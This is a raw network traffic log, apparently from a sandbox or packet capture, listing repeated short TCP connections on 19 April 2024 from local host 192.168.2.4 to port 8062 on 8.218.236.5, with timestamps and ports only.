Apr 19, 2024 09:52:41.005179882 CEST	8062	49941	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:41.005197048 CEST	49941	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:41.005230904 CEST	49941	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:41.006732941 CEST	49941	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:41.112690926 CEST	49942	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:41.324326992 CEST	8062	49941	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:41.433329105 CEST	8062	49942	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:41.433438063 CEST	49942	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:41.458304882 CEST	49942	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:41.792903900 CEST	8062	49942	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:41.794555902 CEST	8062	49942	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:41.794594049 CEST	8062	49942	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:41.801223993 CEST	49942	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:42.300508022 CEST	49942	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:42.426356077 CEST	49943	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:42.618232012 CEST	8062	49942	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:42.764132023 CEST	8062	49943	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:42.764252901 CEST	49943	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:42.764543056 CEST	49943	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.102427959 CEST	8062	49943	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:43.104106903 CEST	8062	49943	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:43.104121923 CEST	8062	49943	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:43.104165077 CEST	49943	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.104190111 CEST	49943	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.104262114 CEST	49943	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.220561981 CEST	49944	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.441853046 CEST	8062	49943	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:43.546660900 CEST	8062	49944	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:43.546752930 CEST	49944	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.546942949 CEST	49944	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.868494987 CEST	8062	49944	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:43.870317936 CEST	8062	49944	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:43.870337963 CEST	8062	49944	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:43.870517969 CEST	49944	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.870518923 CEST	49944	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:43.985646009 CEST	49945	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:44.192466021 CEST	8062	49944	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:44.305876017 CEST	8062	49945	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:44.306077957 CEST	49945	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:44.306241035 CEST	49945	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:44.626274109 CEST	8062	49945	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:44.628108025 CEST	8062	49945	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:44.628127098 CEST	8062	49945	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:44.628165960 CEST	49945	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:44.628226995 CEST	49945	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:44.628330946 CEST	49945	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:44.736603975 CEST	49946	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:44.948400021 CEST	8062	49945	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:45.068291903 CEST	8062	49946	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:45.068398952 CEST	49946	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:45.068571091 CEST	49946	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:45.399977922 CEST	8062	49946	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:45.401835918 CEST	8062	49946	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:45.401855946 CEST	8062	49946	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:45.401928902 CEST	49946	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:45.401928902 CEST	49946	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:45.402009010 CEST	49946	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:45.517113924 CEST	49947	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:45.733635902 CEST	8062	49946	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:45.834769964 CEST	8062	49947	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:45.834912062 CEST	49947	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:45.835072041 CEST	49947	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.152678967 CEST	8062	49947	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:46.154726028 CEST	8062	49947	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:46.154745102 CEST	8062	49947	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:46.154990911 CEST	49947	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.154990911 CEST	49947	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.154992104 CEST	49947	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.267050028 CEST	49948	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.473598003 CEST	8062	49947	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:46.593072891 CEST	8062	49948	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:46.593159914 CEST	49948	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.593358040 CEST	49948	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.919214964 CEST	8062	49948	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:46.921005011 CEST	8062	49948	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:46.921049118 CEST	8062	49948	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:46.921057940 CEST	49948	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.921087980 CEST	49948	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:46.921575069 CEST	49948	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:47.033515930 CEST	49949	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:47.247293949 CEST	8062	49948	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:47.358776093 CEST	8062	49949	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:47.358875990 CEST	49949	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:47.359139919 CEST	49949	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:47.684206009 CEST	8062	49949	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:47.689003944 CEST	8062	49949	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:47.689045906 CEST	8062	49949	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:47.689088106 CEST	49949	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:47.689193010 CEST	49949	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:47.689193010 CEST	49949	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:47.798259020 CEST	49950	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:48.014621019 CEST	8062	49949	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:48.115798950 CEST	8062	49950	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:48.116446018 CEST	49950	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:48.120630026 CEST	49950	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:48.438116074 CEST	8062	49950	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:48.440165043 CEST	8062	49950	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:48.440202951 CEST	8062	49950	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:48.440310001 CEST	49950	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:48.440310001 CEST	49950	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:48.440402031 CEST	49950	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:48.548953056 CEST	49951	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:48.758044958 CEST	8062	49950	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:48.870794058 CEST	8062	49951	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:48.870897055 CEST	49951	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:48.871169090 CEST	49951	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:49.197662115 CEST	8062	49951	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:49.197717905 CEST	8062	49951	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:49.197757006 CEST	8062	49951	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:49.197774887 CEST	49951	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:49.197804928 CEST	49951	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:49.197983027 CEST	49951	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:49.315036058 CEST	49952	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:49.519381046 CEST	8062	49951	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:49.642551899 CEST	8062	49952	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:49.649087906 CEST	49952	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:49.649087906 CEST	49952	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:49.976610899 CEST	8062	49952	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:49.978533983 CEST	8062	49952	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:49.978581905 CEST	8062	49952	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:49.980559111 CEST	49952	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:49.981128931 CEST	49952	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:50.096390963 CEST	49953	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:50.308362961 CEST	8062	49952	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:50.422185898 CEST	8062	49953	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:50.422831059 CEST	49953	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:50.423317909 CEST	49953	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:50.748905897 CEST	8062	49953	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:50.750772953 CEST	8062	49953	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:50.750797987 CEST	8062	49953	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:50.750823975 CEST	49953	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:50.750894070 CEST	49953	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:50.750960112 CEST	49953	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:50.863094091 CEST	49954	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:51.076570034 CEST	8062	49953	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:51.184123039 CEST	8062	49954	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:51.184230089 CEST	49954	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:51.184426069 CEST	49954	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:51.505367994 CEST	8062	49954	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:51.507703066 CEST	8062	49954	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:51.507741928 CEST	8062	49954	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:51.507761002 CEST	49954	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:51.507816076 CEST	49954	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:51.508099079 CEST	49954	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:51.612356901 CEST	49955	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:51.828898907 CEST	8062	49954	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:51.934659004 CEST	8062	49955	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:51.938463926 CEST	49955	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:51.938976049 CEST	49955	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:52.263494015 CEST	8062	49955	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:52.265281916 CEST	8062	49955	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:52.265320063 CEST	8062	49955	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:52.265358925 CEST	49955	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:52.265466928 CEST	49955	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:52.265551090 CEST	49955	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:52.378359079 CEST	49956	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:52.587905884 CEST	8062	49955	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:52.693943977 CEST	8062	49956	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:52.694147110 CEST	49956	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:52.694231987 CEST	49956	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.009884119 CEST	8062	49956	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:53.011755943 CEST	8062	49956	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:53.011794090 CEST	8062	49956	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:53.011828899 CEST	49956	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.011898994 CEST	49956	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.011954069 CEST	49956	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.127806902 CEST	49957	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.328871012 CEST	8062	49956	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:53.453175068 CEST	8062	49957	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:53.453321934 CEST	49957	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.453536987 CEST	49957	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.778778076 CEST	8062	49957	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:53.780586958 CEST	8062	49957	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:53.780622959 CEST	8062	49957	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:53.780805111 CEST	49957	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.780806065 CEST	49957	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.780806065 CEST	49957	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:53.892345905 CEST	49958	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:54.106138945 CEST	8062	49957	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:54.220257998 CEST	8062	49958	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:54.220587015 CEST	49958	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:54.220988035 CEST	49958	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:54.551404953 CEST	8062	49958	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:54.553122044 CEST	8062	49958	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:54.553158998 CEST	8062	49958	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:54.553329945 CEST	49958	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:54.553330898 CEST	49958	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:54.553467989 CEST	49958	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:54.668742895 CEST	49959	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:54.881197929 CEST	8062	49958	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:54.987934113 CEST	8062	49959	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:54.988023043 CEST	49959	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:54.988238096 CEST	49959	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:55.307313919 CEST	8062	49959	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:55.309191942 CEST	8062	49959	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:55.309228897 CEST	8062	49959	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:55.309264898 CEST	49959	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:55.309340000 CEST	49959	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:55.309380054 CEST	49959	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:55.423799992 CEST	49960	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:55.628498077 CEST	8062	49959	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:55.748697042 CEST	8062	49960	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:55.749094009 CEST	49960	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:55.749094009 CEST	49960	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.074038982 CEST	8062	49960	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:56.075943947 CEST	8062	49960	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:56.075980902 CEST	8062	49960	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:56.076018095 CEST	49960	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.076090097 CEST	49960	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.076402903 CEST	49960	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.190349102 CEST	49961	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.401243925 CEST	8062	49960	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:56.527318954 CEST	8062	49961	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:56.527616024 CEST	49961	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.528860092 CEST	49961	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.865855932 CEST	8062	49961	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:56.867722988 CEST	8062	49961	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:56.867764950 CEST	8062	49961	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:56.867779970 CEST	49961	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.867813110 CEST	49961	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.867896080 CEST	49961	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:56.986738920 CEST	49962	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:57.204875946 CEST	8062	49961	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:57.297641039 CEST	8062	49962	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:57.297739983 CEST	49962	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:57.297964096 CEST	49962	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:57.608675003 CEST	8062	49962	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:57.610459089 CEST	8062	49962	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:57.610497952 CEST	8062	49962	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:57.610521078 CEST	49962	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:57.610584974 CEST	49962	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:57.610827923 CEST	49962	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:57.722358942 CEST	49963	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:57.921451092 CEST	8062	49962	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:58.048144102 CEST	8062	49963	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:58.050575018 CEST	49963	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:58.050915956 CEST	49963	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:58.376596928 CEST	8062	49963	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:58.378549099 CEST	8062	49963	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:58.378587961 CEST	8062	49963	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:58.382469893 CEST	49963	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:58.382471085 CEST	49963	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:58.486371994 CEST	49964	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:58.708502054 CEST	8062	49963	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:58.807358980 CEST	8062	49964	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:58.807571888 CEST	49964	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:58.807662964 CEST	49964	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:59.128398895 CEST	8062	49964	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:59.130950928 CEST	8062	49964	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:59.131009102 CEST	8062	49964	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:59.131212950 CEST	49964	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:59.131212950 CEST	49964	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:59.131213903 CEST	49964	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:59.236452103 CEST	49965	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:59.452145100 CEST	8062	49964	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:59.565538883 CEST	8062	49965	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:59.565732956 CEST	49965	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:59.565825939 CEST	49965	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:59.895009041 CEST	8062	49965	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:59.897444010 CEST	8062	49965	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:59.897483110 CEST	8062	49965	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:59.897644997 CEST	49965	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:59.897993088 CEST	49965	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:00.009999037 CEST	49966	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:00.226984978 CEST	8062	49965	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:00.332313061 CEST	8062	49966	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:00.336572886 CEST	49966	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:00.336796999 CEST	49966	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:00.659307003 CEST	8062	49966	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:00.660995960 CEST	8062	49966	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:00.661037922 CEST	8062	49966	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:00.661209106 CEST	49966	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:00.661209106 CEST	49966	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:00.661642075 CEST	49966	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:00.767509937 CEST	49967	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:00.983871937 CEST	8062	49966	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:01.077047110 CEST	8062	49967	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:01.077249050 CEST	49967	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:01.077363014 CEST	49967	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:01.386579037 CEST	8062	49967	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:01.388762951 CEST	8062	49967	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:01.388818979 CEST	8062	49967	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:01.388840914 CEST	49967	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:01.388890982 CEST	49967	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:01.388890982 CEST	49967	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:01.501151085 CEST	49968	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:01.698218107 CEST	8062	49967	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:01.830950975 CEST	8062	49968	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:01.831141949 CEST	49968	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:01.831455946 CEST	49968	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.161170006 CEST	8062	49968	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:02.163028002 CEST	8062	49968	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:02.163064957 CEST	8062	49968	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:02.163106918 CEST	49968	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.163448095 CEST	49968	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.267230034 CEST	49968	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.267254114 CEST	49969	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.582746983 CEST	8062	49969	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:02.584661007 CEST	49969	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.584661007 CEST	49969	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.596827984 CEST	8062	49968	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:02.900043011 CEST	8062	49969	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:02.902736902 CEST	8062	49969	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:02.902776003 CEST	8062	49969	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:02.902934074 CEST	49969	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.902934074 CEST	49969	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:02.902934074 CEST	49969	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:03.029336929 CEST	49970	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:03.218245983 CEST	8062	49969	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:03.351898909 CEST	8062	49970	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:03.352008104 CEST	49970	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:03.352248907 CEST	49970	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:03.674726963 CEST	8062	49970	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:03.677175045 CEST	8062	49970	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:03.677217007 CEST	8062	49970	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:03.677385092 CEST	49970	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:03.678884029 CEST	49970	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:03.787811041 CEST	49971	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:03.787817955 CEST	49970	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:04.110277891 CEST	8062	49970	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:04.114181995 CEST	8062	49971	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:04.114573002 CEST	49971	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:04.114854097 CEST	49971	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:04.441556931 CEST	8062	49971	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:04.446613073 CEST	8062	49971	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:04.446650982 CEST	8062	49971	8.218.236.5	192.168.2.4
